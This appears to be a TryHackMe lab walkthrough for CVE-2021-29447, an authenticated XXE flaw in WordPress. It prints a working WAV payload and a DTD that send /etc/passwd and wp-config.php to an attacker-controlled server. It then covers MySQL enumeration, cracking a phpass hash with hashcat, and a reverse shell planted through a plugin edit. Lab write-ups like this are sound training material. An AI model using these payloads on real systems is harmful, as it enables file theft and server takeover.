Skip to content

Wordpress CVE

TryHackMe Link

Description

This walkthrough discusses an XXE vulnerability found in the WordPress Media Library by security firm SonarSource. The impact of the vulnerability includes arbitrary file disclosure and server-side request forgery. It also describes how the vulnerability can be exploited using the WPScan tool.

Warning

The vulnerability can only be exploited only when WordPress runs on PHP 8 and the attacker has permission to upload media files.

To Complete the room, we need to find and answer the below question:

  • Use the vulnerability CVE-2021-29447 to read the wordpress configuration file.
  • what is the name of the database for WordPress?
  • what are the credentials you found? (user:password)
  • Enumerate and identify what is the dbms installed on the server?
  • what is the dbms version installed on the server?
  • what port is the dbms running on?
  • What is the encrypted password located in the wordpress users table with id 1??
  • What is the password in plaint text?
  • Compromise the machine and locate flag.txt

Scanning

  • Assigned IP address:  

  • Open Ports:

PORT

SERVICE

DESCRIPTION

  • Nmap Report: 
     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
      Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 08:31 EST
  Nmap scan report for 10.10.234.15
  Host is up (0.15s latency).
  Not shown: 997 closed tcp ports (conn-refused)
  PORT     STATE SERVICE VERSION
  22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 f065b842b7c3ba8efee43ccd57f1292e (RSA)
  |   256 421e1b8f1938992e3670cf0eb6319214 (ECDSA)
  |_  256 8e8943de5d9b9966c42a9317f30ee1f4 (ED25519)
  80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-title: Tryhackme – Just another WordPress site
  |_http-generator: WordPress 5.6.2
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  3306/tcp open  mysql   MySQL czjqqkd:0REDACTEDczjqqkd:1-0ubuntu0.16.04.1
  | ssl-cert: Subject: commonName=MySQL_Server_czjqqkd:2REDACTEDczjqqkd:3_Auto_Generated_Server_Certificate
  | Not valid before: 2021-05-26T21:23:31
  |_Not valid after:  2031-05-24T21:23:31
  | mysql-info: 
  |   Protocol: 10
  |   Version: czjqqkd:4REDACTEDczjqqkd:5-0ubuntu0.16.04.1
  |   Thread ID: 93
  |   Capabilities flags: 65535
  |   Some Capabilities: SupportsTransactions, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongColumnFlag, SwitchToSSLAfterHandshake, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, FoundRows, ODBCClient, SupportsCompression, LongPassword, Speaks41ProtocolNew, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
  |   Status: Autocommit
  |   Salt: Av2C[)\x12R\x12N-<\x1BIw\x1F\x1E\x13g_
  |_  Auth Plugin Name: mysql_native_password
  |_ssl-date: TLS randomness does not represent time
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 29.21 seconds

Exploiting CVE-2021-29447

The vulnerability identified in CVE-2021-29447 pertains to an Authenticated XXE Within the Media Library Affecting PHP 8. To exploit this vulnerability, I followed the instructions provided and created a WAV media file that could be uploaded in the WordPress dashboard under the media library section.

This can be created as follows:

payload.wav File Payload

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '''''http://10.17.3.217:8000/NAMEEVIL.dtd'''''>%remote;%init;%trick;]>\x00' > payload.wav

Once uploaded, I was able to use this file to establish a connection back to my HTTP server and execute an XXE attack by including /etc/passwd without proper validation, thereby accessing sensitive data on the targeted system. For this purpose, I also created a custom file called NAMEEVIL.dtd, which connected to the server and provided content in encoded base64 form.

NAMEEVIL.dtd

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.17.3.217:8000/?p=%file;'>" >

By decoding the /etc/passwd file, I was able to successfully exploit the vulnerability.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
   root:x:0:0:root:/root:/bin/bash
   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
   bin:x:2:2:bin:/bin:/usr/sbin/nologin
   sys:x:3:3:sys:/dev:/usr/sbin/nologin
   sync:x:4:65534:sync:/bin:/bin/sync
   games:x:5:60:games:/usr/games:/usr/sbin/nologin
   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
   www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
   systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
   systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
   systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
   systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
   syslog:x:104:108::/home/syslog:/bin/false
   _apt:x:105:65534::/nonexistent:/bin/false
   messagebus:x:106:110::/var/run/dbus:/bin/false
   uuidd:x:107:111::/run/uuidd:/bin/false
   czjqqkd:6REDACTEDczjqqkd:7:x:1000:1000:CVE-2021-29447,,,:/home/czjqqkd:8REDACTEDczjqqkd:9:/bin/bash
   sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
   mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false

Exploiting Wordpress

The next step is to enumerate the WordPress website on port 80 and obtain its wp-config.php. This file meets the requirement of the first objective in the current room.

  • Use the vulnerability CVE-2021-29447 to read the wordpress configuration file.

By gaining access to the wp-config.php file, I can obtain sensitive data, such as database credentials, that can be used to further penetrate the system. I used same technique as follows by replacing the dtd file with

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">

Here is the decoded Base64 file that answers these questions:

  • what is the name of the database for WordPress? Line 23
  • what are the credentials you found? (user:password) Line 26 & 29
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 <?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'REDACTED' );

/** MySQL database username */
define( 'DB_USER', 'REDACTED' );

/** MySQL database password */
define( 'DB_PASSWORD', 'REDACTED' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Gaining ADMIN account

After obtaining the database credentials, I attempted to log in to MySQL, as our scanning process revealed that it was open on port 3306. Upon logging in, I discovered the presence of a REDACTED database that contained usernames and databases. 

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| REDACTED           |
+--------------------+



Database changed
MySQL [REDACTED]> show tables;
+----------------------------+
| Tables_in_REDACTED         |
+----------------------------+
| REDACTED_commentmeta       |
| REDACTED_comments          |
| REDACTED_links             |
| REDACTED_options           |
| REDACTED_postmeta          |
| REDACTED_posts             |
| REDACTED_term_relationships|
| REDACTED_term_taxonomy     |
| REDACTED_termmeta          |
| REDACTED_terms             |
| REDACTED_usermeta          |
| REDACTED                   |
+----------------------------+

I quickly accessed REDACTED table and retrieved the administrator's username and password. This was crucial, as the current user did not have full access to other WordPress features. With the admin's credentials, I can now carry out more advanced attacks to gain shell.

One of the row in REDACTED table

|  1 | corp-001   | REDACTED | corp-001      | corp-001@fakemail.com

I investigated further to know about its hash-type and learnt that is was 'phpass', and I cracked it through hashcat.

Cracking Password

  hashcat -a 0 -m 400 'REDACTED' ~/rockyou.txt

  [REDACTED]:[REDACTED]

This section answered the following questions:

  • Enumerate and identify what is the dbms installed on the server? MySQL
  • what is the dbms version installed on the server? REDACTED
  • what port is the dbms running on? 3306
  • What is the encrypted password located in the wordpress users table with id 1?? REDACTED
  • What is the password in plaint text? REDACTED

Initial Foothold

In order to gain shell, I changed the WordPress account to the corp-001 admin account and began exploring the plugin feature. Initially, I attempted to perform an Arbitrary File Upload by downloading a vulnerable Gallery Plugin, but unfortunately, my attempts were failed.

then, I proceeded to deactivate that plugin and attempted to edit one of the php files with my custom PHP reverse shell code. By doing so, I aimed to establish a reverse shell on the system, granting me remote access and control.

and the last question was answered!

  • Compromise the machine and locate flag.txt